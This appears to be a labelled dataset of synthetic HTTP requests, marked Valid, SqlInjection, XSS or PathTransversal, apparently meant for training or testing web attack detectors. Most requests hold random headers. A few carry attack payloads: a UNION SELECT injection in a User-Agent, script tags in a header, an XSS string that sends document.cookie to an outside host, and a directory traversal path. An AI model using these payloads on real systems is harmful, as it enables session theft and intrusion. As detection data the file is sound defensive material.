Referer: /dmnib/ldwAT/t6eMaahO/wtod.mpeg
TE: trailers,gzip,deflate;q=0.6
Trailer: Via
User-Agent: 6wzqPcP7aN (adxzkahKcR)
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 0.0 www.ieeur.tiff
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: ---------------
~~~~~: ~~~~~~~~~~~

C1aeCGacceptBCyLW=eem&gSTstd0ze=oesnf&sttteE=tnO_&ihihtrsrc1ez5kn=uat&vdlN9=ehfsnqlhtaccesnbinnc

End - Id: 7971
Start - Id: 35085
class: SqlInjection
GET /oazbDBFYEgxDEnYgtXA/siBhisVavh4umicm/exCJVqwQ/ThEU_bin5mRl8_t@/amhDst4/tbWtBallR/lets/n_PKOBLfCYYP7-w/nsdm0/i5Uu1ZCM.2cmyr/lRZ.Hxefh_/eeeeeal7e.mdb?e6kdmpzs=cVp1i&ttronPstUee2ea=6387&kautoiRohndt=2%25&nKTco9execabetween82=%5D&horgconuInara=tEyZDsRnWQDi HTTP/1.0
Host: 138.228.125.117
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1251;q=0.4, us-ascii;q=0.0, x-mac-ce, windows-1258;q=0.6, x-mac-ce
Accept-Encoding: identity;q=0.1, compress;q=0.4, gzip;q=0.1, gzip
Accept-Language: *;q=0.3
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Expect: 100-continue
If-Range: Thu, 17 Sep 09 22:57:14 UTC
Referer: /s9noeu8/pu6m/efra/seh8ust.php3
User-Agent: ' )  UNION ALL SELECT    wp9   FROM   csteobetA9     WHERE    (    ''  =   '
Via: 2.1 www.ib1Hgcq.tiff, HTTP/3.6 www.goealme.css, tEede9/3.4 www.y3olwsl.htm:5895
Transfer-Encoding: gtzAa1

null

End - Id: 35085
Start - Id: 26520
class: Valid
GET /a5f5tioiieteqtuce/r@plwwktL/rwlcieeahyezov/fI/e36Cerq/iClOkX-UJ_.aspx?dsaeu2isl9oer=rtyeeisang&heigobAdrsyEiO8=cIeirtih&e1ipteosykshOdE=l%3CtnFgliessbah8munion&szt7hqfsuaAqem=n%3Dutelneth&igy0cg=linnu1RSa%7EeS+&6odhtfEerhhatCj=processing-instructionb7mwgete%28t%3C7lE1+ae&guoATutxni=eJ64d-rh9Kb HTTP/1.1
Host: 104.26.13.224:80
Connection: yDutla
Accept: */*;q=0.8
Accept-Charset: windows-1257;q=0.5, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: Oavzai-lsl;q=0.4, uAioPedi-Lomm;q=0.9, do-is;q=0.9
Cache-Control: min-fresh=28
Client-ip: 235.21.77.85
Cookie: teaor=ienlttoxce;eoe63dlTe=o2ylowtBvhNx;5noret2me=Es;elyin0bseik=shutdownki;puosair=9779479;hie=ed7hiwskj2hz
Cookie2: $Version="222"
Date: Tue, 11 Mar 08 06:04:08 CET
ETag: "eY1L8od5@@yXGGQz"
Expect: 100-continue
From: 7vteaPad@uansAaaste.de
If-Modified-Since: Mon, 29 Mar 04 19:42:01 CET
If-Unmodified-Since: Sat, 31 Oct 09 20:25:00 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:04:41 CET
Max-Forwards: 4
MIME-Version: 2.6
Pragma: pbh='zpun'
Proxy-Authorization: Basic dTVvbjpoYW10N2lU
Authorization: Digest uri=/jdehai/aosetsoc/hhr3/AA0l.pdf
Range: -51243,13953-
Referer: /eoa6b.avi
TE: trailers,chunked,gzip;q=0.7
Trailer: TE
User-Agent: Mozilla/3.6 (compatible; ahtsAf; Linux i586; ebuekn; Vgsuucn; oefh4iT)
UA-CPU: MIPS
UA-Disp: 196,1836,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: 5.3 223.126.118.202:5899
Transfer-Encoding: gzip
Upgrade: ant/0.2, ebe/2.0
Warning: 836 www.nehybsh.png:6 "sp4oewrMtto" "Tue, 03 Feb 04 12:30:53 UTC"
X-Forwarded-For: 36.115.237.41
X-Serial-Number: 693373977262
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26520
Start - Id: 16185
class: Valid
GET /nTU07QWKgvZ/x68GXBJ7Cu-IBZ/t@V3Knr/nPQxvdQY.BLMBnkS@J6u/6-e6.php3? HTTP/1.1
Host: 143.20.2.226
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, utf-8;q=0.5, euc-tw;q=0.1
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 8.227.150.151
Cookie: ecrgT=rfs4sgWGnnicreR0;nmeiNawElnhuem=\ee;autoexeczamlhadmin-EL=cnsmlgcma;FxCk.formxT8logG=\s
Cookie2: $Version="114"
Date: Fri, 15 Sep 06 12:39:04 CET
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: mpnioir=nome;7utacuek
From: oltae@ieknifNr4.org
If-Modified-Since: Mon, 06 Jun 05 10:33:23 CET
If-Unmodified-Since: Fri, 14 Jul 06 23:04:28 GMT
If-Match: *
If-None-Match: "_.zwxUtMs2Uunxhk"
If-Range: "noaBxBVI_Gcijl.DyK"
Max-Forwards: 4084
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic YWlybDJjOXg6bG93YQ==
Authorization: Digest opaque="xIowpScs"
Range: 2181-,58-,9-1
Referer: http://qrhcaae.com/cd5awh.php
TE: gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: iayi5t/9.3.5
UA-CPU: PowerPC
UA-Disp: 121,346,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 6.1 203.162.164.190, HTTP/3.8 www.phwerc.shtml
Transfer-Encoding: compress
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 66.190.19.60
X-Serial-Number: 4241402409
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16185
Start - Id: 7777
class: Valid
PUT /scz/2ao/dfLAW/gcmdYT6TTwCZ.png? HTTP/1.0
Content-Length: 45
Content-Language: reeoh,eehcn
Content-Encoding: gzip
Content-Location: http://www.eiatA.org/tsa6tdy/anty/el92c/tarnao.txt
Content-MD5: ZWxlbHlneWNtdG9udHlSbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Mar 08 12:23:44 GMT
Last-Modified: Tue, 15 Jan 08 08:39:50 UTC
Host: 152.54.191.83
Connection: keep-alive
Accept: video/*;q=0.8, image/gif;q=0.6, image/jpeg
Accept-Charset: windows-874
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.184.5.24
Cookie: lcyci0le2d=itTiftpnullTa<rcp1set;thzatn7eseeedt9=ljJ1nF;e8BshutdownY4i=19YPayba0;ahT6i=e lor Hzts
Cookie2: $Version="767"
Date: Sat, 26 Mar 05 07:00:10 UTC
ETag: W/"8RQB1Qe.P@oXtZte.vHq"
Expect: 100-continue
From: oisdmr@eobueIsd.net
If-Modified-Since: Fri, 19 Jan 07 24:52:27 GMT
If-Unmodified-Since: Sat, 11 Aug 07 01:51:20 CET
If-Match: "zaq5srJGJrt.abqGK"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.5
Pragma: o=Uotfaeto
Proxy-Authorization: eote tt3r=ttotib1
Authorization: Basic dTJmZXM6bGFzcw==
Range: 94467-
Referer: /tmLul/tl4fng/i5oeEh/fthh9eji.php
TE: deflate;q=0.9,trailers
Trailer: Date
User-Agent: dwhtdtatccaarSCdtioi
UA-CPU: StrongARM
UA-Disp: 761,954,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 669x1617
Via: 4.3 103.40.156.43
Transfer-Encoding: compress
Upgrade: etdnet/8.2
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 103.217.94.43
X-Serial-Number: 446017
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

edOtlhcteashlAS=4yetmps o&NerojihShr3sVE=1275

End - Id: 7777
Start - Id: 10727
class: Valid
GET /i9and/allgW6VW/XPHKOwYC.tiff?7jea=3KaC4Vb&biam=852&es4rans8Ieisec=2scriptcxgnoqolnand%3Etgnlx%3C&RMQwPgxs=81141194&reOatHrw=+n&mmpyeba34faese=cn0&hZZOif=dtopgaqtnO8bi HTTP/1.1
Host: www.npitcmtwg.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 4.31.123.70
Cookie: erhiJlxnvNvkaD=25496;etxD5h8FlaeaQm=76456;ynottEcuTdaFe=sock_streamcehninNcr 5npm tftpxe;amaTzasg=hai;felaMrfyciby78=kJqoyU_d
Cookie2: $Version="2"
Date: Sun, 14 Sep 08 23:53:49 CET
ETag: W/"Xy24taYKp@Q2IuJ7ZQFM"
Expect: sIga
From: iEhs6@tsbIsEt3.org
If-Modified-Since: Wed, 11 Nov 09 04:07:49 CET
If-Unmodified-Since: Fri, 30 Jun 06 23:26:51 GMT
If-Match: "k-6KpY7Qn1XgP49"
If-None-Match: *
If-Range: "sqnQ2vduYLXEqYW"
Max-Forwards: 55
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 02-95
Referer: /ceeuo/2tpo/tnTobos/ig2gL/emcTde.doc
TE: chunked;q=0.2
Trailer: If-Range
User-Agent: rg2e4rO6eibhnd
UA-CPU: x86
UA-Disp: 592,9913,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 060x417
Via: FTP/2.9 215.173.251.175
Transfer-Encoding: tiey
Upgrade: gjt/4.3, itcx/2.4, irszE/9.6, eddtrv/8.3, o0tg/6.1
Warning: 426 117.201.51.141 "WtatHstet1tscTat" 
X-Forwarded-For: 119.229.255.152
X-Serial-Number: 62509497376132928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10727
Start - Id: 23724
class: Valid
GET /mn5ce3samisjcsqtq.bin?jjfiY75RBc_b=01828508&9a=a85%40&oe=eoeezjoeeKsyGginn&layntha=oema&KiNselectPL=3oXS7uc%2B9iE-&syr6amF8itJrng=nnLfeh&smaa=obo8ls HTTP/1.1
Host: www.a42e.it
Connection: keep-alive
Accept: application/*;q=0.6, application/rtf;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, compress, compress
Accept-Language: *;q=0.8
Cache-Control: aes=oiog0e
Client-ip: 13.117.64.92
Cookie: nhkeeuenHnqcah=sROSw.sX;ie9=01977
Cookie2: $Version="45"
Date: Sat, 08 Jan 05 22:32:18 UTC
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: 100-continue
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Fri, 25 Jun 04 07:35:16 UTC
If-Match: *
If-None-Match: "TQ9vzwAY4Ou5JU@HHn2"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.4
Pragma: a=sphwh2It
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: dsuae otp9=inl7iat
Range: 88-,49-031,14468-474
Referer: http://www.ee2setsi.com/oaeikieR.avi
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 3.4; 7p-Se; rv:5.7.6) Gecko/43104398
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 431x276
Via: 6.2 200.240.125.212:79, 8.5 105.155.161.198
Transfer-Encoding: compress
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23724
Start - Id: 46583
class: XSS
GET /rh.htm?eeOa=frlnmarshormec&aittnh5wdbh3dta=4s+%25&ft=dreiihuMo5&CXb6wfG2sS=52nzwtE&rsi7otEeh=xacdocument8heiunionssts&wsSg3autneal=326&h6rr=%28nOtnm&lntrA=74960890&nHqtessw=waasgieapnnpzZlr&laEoao2m=pfgejs&Rcts2Ftrru=2888875&zLttefvslhz=4540376330&nrski5dpi8=O5elUxir5o6uh HTTP/1.1
Host: www.nterh.fr:80
Connection: kuyf
Accept: application/postscript, audio/basic;q=0.3, image/gif
Accept-Charset: cp-936, koi8-r;q=0.2, windows-1257
Accept-Encoding: *;q=0.1
Accept-Language: <<script >[alert   ('ttuuc');]</script  >
Cache-Control: no-transform
Client-ip: 127.70.72.150
Cookie: 2em7h=n~?ocm5t)0drnewindow.openr;leO1oagbeettt=sUwNC;R5w5RP=idNd4ds;nbphtfsecszcne=9mRI7iatte
Cookie2: $Version="4"
Date: Fri, 06 Jun 08 07:01:54 CET
ETag: "71Shv.49HXB8z5jdi2q"
Expect: 100-continue
From: h45nome@nksh.fr
If-Modified-Since: Wed, 31 Aug 05 09:57:39 CET
If-Unmodified-Since: Tue, 06 Apr 10 22:07:42 CET
If-Match: *
If-None-Match: "ife@pSBAFKlG0xfGWPF"
If-Range: *
Max-Forwards: 08
MIME-Version: 6.4
Pragma: dQm='nfdaea'
Proxy-Authorization: Digest nonce
Authorization: pTnwR siFe=oigztm
Range: -786
Referer: http://teeehe.net/oe0o/ttlap/y6mhys.swf
TE: gzip;q=0.2,gzip;q=0.1,gzip
Trailer: Expect
User-Agent: Mozilla/6.6 (Windows; U; WinNT 1.7; w6-ge; rv:1.7.5) Gecko/45942174
UA-CPU: PowerPC
UA-Disp: 676,907,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 991x9240
Via: FTP/7.0 www.tc3bnvy.htm, 0.7 250.202.235.159:79468
Transfer-Encoding: compress
Upgrade: 2ijn/6.2
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 23.216.88.9
X-Serial-Number: 34246962990912
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46583
Start - Id: 24005
class: Valid
GET /m0bHBDbJgbvWCGM2Wt2D/2kh/1S/J7@-kEnhTn6t/50cyjSHv6vXl/i380qRwLNj0i6DF/manaheoRs7/T4snxn0ct5tgttaE/rBEservicessZ_Hhwwinntg.tiff? HTTP/1.1
Host: 100.64.245.15:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.3, iso-8859-6;q=0.6, iso-8859-3, windows-1254;q=0.0, iso-8859-7;q=0.5
Accept-Encoding: 
Accept-Language: r4-3o3uu, 9goea-oneetRb;q=0.6, Grne-i;q=0.8, SmnI-5waNI;q=0.8, n4esn-nattmz;q=0.6
Cache-Control: only-if-cached
Client-ip: 164.142.186.27
Cookie: 7opcae=oN8q;Kqscript@u1D=passwd0|;lutei=mJE3lhGXkV7l
Cookie2: $Version="905"
Date: Tue, 19 Aug 08 23:29:10 GMT
ETag: W/"tsyvamE5kv4yCK-6"
Expect: 100-continue
From: rESt9@oraehs.ch
If-Modified-Since: Fri, 01 Jan 10 03:07:52 UTC
If-Unmodified-Since: Sat, 05 Jan 08 04:33:27 CET
If-Match: *
If-None-Match: "UtjN8dHWIZY1.Zy8MaXN"
If-Range: Sun, 22 Apr 07 15:48:01 CET
Max-Forwards: 072
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM b1RjeW5hdGl4T2VFc2FmYWVpeGVhaWhOMHNhUzJFZGUxbWtu
Authorization: NTLM OXljUHRvbmNqT3Vvb09nZU5vZWVucnJzU29haHVzZXVwbnJkbWRzNmV0
Range: 57-083666,74376-4577,088-
Referer: http://ezgecreg.fr/tnynyLni/wezd.wmn
TE: trailers,gzip;q=0.9
Trailer: Date
User-Agent: wr8aNxM http://www.fai6.ch
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 796x257
Via: deioro/9.0 www.epachus9.gif, 1.1 www.udrttoee.htm, wSwejn/9.0 www.arome.tiff
Transfer-Encoding: identity
Upgrade: berd/1.6
Warning: 468 102.124.44.220 "QreG49doDa" 
X-Forwarded-For: 218.161.129.191
X-Serial-Number: 54119
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 24005
Start - Id: 6808
class: Valid
POST /gLxsh/h9lOwKE-XooaB4ki/rmk9Urru_-owqF_nla/DBEqq/jgcxDsSY@Hw@/rrsczestsz7axsutmeei/xittsnc8.pl? HTTP/1.0
Content-Length: 180
Content-Language: eXqxnesr
Content-Encoding: identity
Content-Location: /tm4oi.asp
Content-MD5: YXl0aG50bjFoZXdhYWpyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jul 07 24:45:14 GMT
Last-Modified: Wed, 08 Nov 06 11:37:21 GMT
Host: www.peoecE.de:16
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1257, koi8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 239.194.209.222
Cookie: oeOeofuhTeAii=a;_Tq.U@winntIbetween=8866
Cookie2: $Version="98"
Date: Sun, 22 Jul 07 03:45:57 CET
ETag: W/"HO-kbK.Uutl3mUwK.5"
Expect: 100-continue
From: cuaymSad@et4y.net
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Wed, 01 Nov 06 17:09:42 UTC
If-Match: ".t9DK_cf3Q_98ZMn"
If-None-Match: "eaOKwBA06T5v@EM0H"
If-Range: *
Max-Forwards: 336
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic ZERhZjplaG5v
Authorization: Basic aWVwZGlyZTppanN6ZHJnaA==
Range: 75-484,-76,208013-709
Referer: http://em1Hjesy.org/itr5.pdf
TE: gzip,trailers,deflate;q=0.9
Trailer: TE
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 7.7; ib-lS; rv:5.1.7) Gecko/96622253
UA-CPU: StrongARM
UA-Disp: 408,046,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5438x9106
Via: 8.8 www.satnnft.htm, FTP/6.1 www.eadpr.css, 1.9 www.D2ta.jpg
Transfer-Encoding: compress
Upgrade: oje/5.1
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

MiaiaagaTssa8lt=91749&maoeot=hh39e oohtnes&0Banj=~n&WPiNff62=8135628&orrpnxctsehoi=a wb&5mochaselect8Z-zqW=lnaRex7&o4Tcnnr=q9o&rRz=8ecvedoLtuih0ywfeH&S1@Pscripti=acwcbcniOreljrWy

End - Id: 6808
Start - Id: 45705
class: PathTransversal
GET /uaCpvVW4RcmdyBX/LhavingNHechokPc5E9U/ow1uBWPLRkqg.msf?a48Oy=2495&nnnoDoThlasetT=R&doifnnn=elreOncaerah0aaHay&z3oEnShaotsaC=popei&cdtltsoetl=iframerlancqnzewp-%2F%7E%24&epNboWw=952467&ata8eld=1&ntig=7so&ns2m=eHvw&aehscbuwet8vShi=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Falllil%2Fanchtionch%2Foles%2Fetitas.php3&rcp9vhwviframeVdelete=2079 HTTP/1.1
Host: www.okbsjn.be:7
Connection: 0hur
Accept: video/quicktime;q=0.1, audio/basic;q=0.5
Accept-Charset: iso-8859-3, windows-1253;q=0.3, iso-2022-kr, windows-1252
Accept-Encoding: 
Accept-Language: ot-o3cM, 7fOh0alt-OrhE3sr;q=0.9, nacAVn-f
Cache-Control: max-stale
Client-ip: 8.138.141.106
Cookie: ete4nes=a;edRu4tiogis=cc6Ystrgmerw
Cookie2: $Version="894"
Date: Thu, 05 Mar 09 02:19:49 CET
ETag: "2j2pLmGkE8-lE0K5GK"
Expect: 100-continue
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Mon, 17 Apr 06 14:47:18 GMT
If-Match: *
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: *
Max-Forwards: 13
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: -934,-807,-703421
Referer: http://v97hkI.net/tsrthc/eelSe.pdf
TE: gzip;q=0.4,deflate,chunked;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 0.1; er-en; rv:0.7.9) Gecko/73730261
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6938x271
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45705
Start - Id: 33079
class: Valid
PUT /tzXnH_Rq/obnnbn1yshesc/ui4rg0hpcreIs/mkrg_UPTnqUR9/srhAg0AftOq@E6qtLvS/oYlrRrl/ryHL0LigyzX4XvpT/x3y/dA8.wmGDU.JWim.cfm? HTTP/1.0
Content-Length: 181
Content-Language: tsbtd8Er
Content-Encoding: gzip
Content-Location: http://www.edenet.ch/piaa0/qseAe/IOrcna.gif
Content-MD5: b2F0N2M4Z25jT2FlbnltMA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Apr 05 07:49:46 CET
Last-Modified: Thu, 04 May 06 07:06:36 CET
Host: 190.140.104.211
Connection: close
Accept: video/*;q=0.5, application/zip, audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: icNoi-I;q=0.5, eUijMlu-awDutre, o1essrre-attd4;q=0.8, ue-oa6iu3
Cache-Control: vaenwep='neotl'
Client-ip: 204.103.118.185
Cookie: cieaedDurowa=8
Cookie2: $Version="0"
Date: Fri, 27 Nov 09 24:19:49 GMT
ETag: "Cxp2bIbJY3Lsi1v"
Expect: 100-continue
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Thu, 21 May 09 11:38:25 UTC
If-Unmodified-Since: Sat, 04 Oct 08 17:03:53 UTC
If-Match: *
If-None-Match: "Li0oUhyyjY9ei0-4ge"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: a=vIn
Proxy-Authorization: djicre antmrrca=sudiea
Authorization: NTLM TWZhaWVWWW9pc3M1b2h0ZHFzdFR0cW9vZmlhcHV0c2k=
Range: -627,-76122
Referer: /acti/nairr6/7uSme.php4
TE: trailers
Trailer: Expect
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 2.7; tr-zs; rv:9.6.7) Gecko/35118686
UA-CPU: 68000
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 697x1733
Via: 1.5 185.200.172.3, 0.0 28.254.151.19, 1.4 www.sr0er.html:94
Transfer-Encoding: compress
Upgrade: isOe/5.3, tbghye/7.5, oos/8.8, oSDrsu/0.3
Warning: 367 www.NNtthSs.tiff "ei0asr" "Mon, 07 Apr 08 05:52:20 CET"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1368641
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tx4oahHdeclLmee=<tmpelT&dobmn=gR6BLeZ.-k03&eodrtdeed=0232632447&ioRllwzeo=npNlps&uLrre2G=429612565&1m=2t Msh5bidihth&KlWdFBvw9Z=7584&reeszrts=sreFO4yenxte&uyv2=xnsam x9&ete7j=thzb

End - Id: 33079
Start - Id: 47703
class: XSS
GET /aap/nfS6NTWpmb/dlneoiagae7whyoll/.Uv-M-qWBf.yS/2iuykyTMKfmr2Ckmx/nt5vuTxa93cSF@/ic5NY0.gif?tmeoLiensltb=%3C%3Cscript%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.an.com%2Fcgi-bin%2Fvecher.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&atalaoeahRjndr=134&gre=avtr4&trSf=064600 HTTP/1.1
Host: 75.128.52.28
Connection: keep-alive
Accept: image/*;q=0.4, audio/x-wav, audio/*
Accept-Charset: iso-8859-2, euc-tw
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: *;q=0.5
Cache-Control: min-fresh=44
Client-ip: 29.159.169.244
Cookie: atnrrc=e;2tU@3=ssl4evalx~Yn;eiarteademlod=awSE3_AVssZ;orkspssasqca=q4KKrylZ@p;roorat9C7dcDnSi=9545077
Cookie2: $Version="6"
Date: Sun, 08 May 05 13:29:17 GMT
ETag: W/"XsttvGY924rMZZs4W"
Expect: ps4sdN
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 18 Jul 08 16:50:30 CET
If-Unmodified-Since: Wed, 17 Aug 05 03:55:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: Basic cmx0MjpyOWU3cw==
Range: 37-9480,573294-46248,0850-768
Referer: /ejdf86A.cfm
TE: trailers
Trailer: From
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 1.7; it-ot; rv:5.3.1) Gecko/20460613
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: 4Siht/2.2
Warning: 681 105.145.39.255 "iAonrneh" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47703
Start - Id: 17848
class: Valid
GET /dcrPHy/higroup byPYBxmllQs81NE/Rntunu0nad/YDUinput/r14k.C_E/lkeSd3uOnatgkU7ck@BS/hCBQXIrWsG_Ohcq/antameriTrn/jFYZ6i.png?9uATnlmtasn=i2slignn&knar3dnearko=1rkiro6xatvtd1aano&epeisghir=noautrd1%27di&oseaphttat=x7oxUpRRf&i.hol@=rsutloO&trrlsoeNqa=oin&itHa=50&dd=1915682&7octe=sEoi&daha1n=s&5hbs75jikroha=ynN%29sea%5Bxt%3Emu4tlO&ases=eT HTTP/1.0
Host: www.cteeEi.be
Connection: close
Accept: */*
Accept-Charset: euc-cn, windows-874;q=0.9, iso-8859-2, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: aur='e'
Client-ip: 230.33.225.198
Cookie: 6YselectL-xVs_lw=b;x4mj4w8=o;1eivt9H6enooi=190966;deleteNRmsystemM7metaFkN=ascripti3;pa8.=ac
Cookie2: $Version="503"
Date: Wed, 13 Aug 08 13:40:04 CET
ETag: "GmYG65fP8d7@e.XDKdK"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Sun, 01 Jul 07 14:02:13 UTC
If-Unmodified-Since: Mon, 24 Sep 07 20:03:41 GMT
If-Match: "Gg@tbkqzOjXknJ4"
If-None-Match: *
If-Range: Mon, 05 Apr 04 16:04:49 UTC
Max-Forwards: 812
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/cied43/n2tr/gSdoo5nw.php3
Range: 5-3
Referer: /5iel9il/hbqiencm/na5a.conf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: onle4/9.0.6.5.3
UA-CPU: 68000
UA-Disp: 8443,978,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3160x969
Via: 5.6 237.206.238.111:89, HTTP/5.7 62.26.83.78, 2l5ihb/6.8 177.54.11.252
Transfer-Encoding: deflate
Upgrade: Meee/4.6, nrwisN/0.0, 0Idlt/2.9, iknhr/5.4
Warning: 251 www.imAynCn2.html:1876 "wyu5ls5teb2nziefeO" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 164483377111827
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17848
Start - Id: 21205
class: Valid
GET /ekttdPNsbekett/1rYSdGYGhJULexec.jpg?sn8=812&uzEtouAaueter=p+crs HTTP/1.0
Host: www.9egIpn.st
Connection: keep-alive
Accept: audio/x-wav, text/*, image/png;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: max-age=4
Client-ip: 205.157.119.187
